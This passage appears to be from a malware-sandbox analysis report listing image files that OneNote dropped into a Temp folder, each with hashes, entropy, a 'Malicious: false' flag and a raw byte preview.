Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{6326F44D-15E0-4D9B-ACF3-7DB1DEA97F79}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{655642A3-25B2-4FA5-B74D-F41BE2E5C68F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{65610ECA-E82C-4E47-8149-D063B608A764}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{65702E3B-E6CE-4E72-BF8B-876A9B12B3DC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{6713FF13-FBEE-4A51-80BE-EADCD40C6D32}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{67228177-7471-4A19-8706-83E1E3BBA143}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Temp\{679B195D-3427-42B8-9756-69CC56C10D4E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{68A44D1E-365A-4678-8C19-71707A84F6C2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Temp\{6A748AEE-88C1-46D9-A541-A02A87829698}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{6BB32635-5FE5-4E22-B463-3D898F92AB3C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{6D5D1834-2A30-4943-80E9-21B281274420}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{6DEEE892-FE9D-4496-AA30-293F7669898F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{6E254EE5-F13F-4B12-ABF4-3D6DC62007AC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Temp\{6F3F7DEB-F963-4352-A391-89EBCAE461E7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Temp\{7025E513-17AF-4B39-ABCB-8226BACA8B71}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
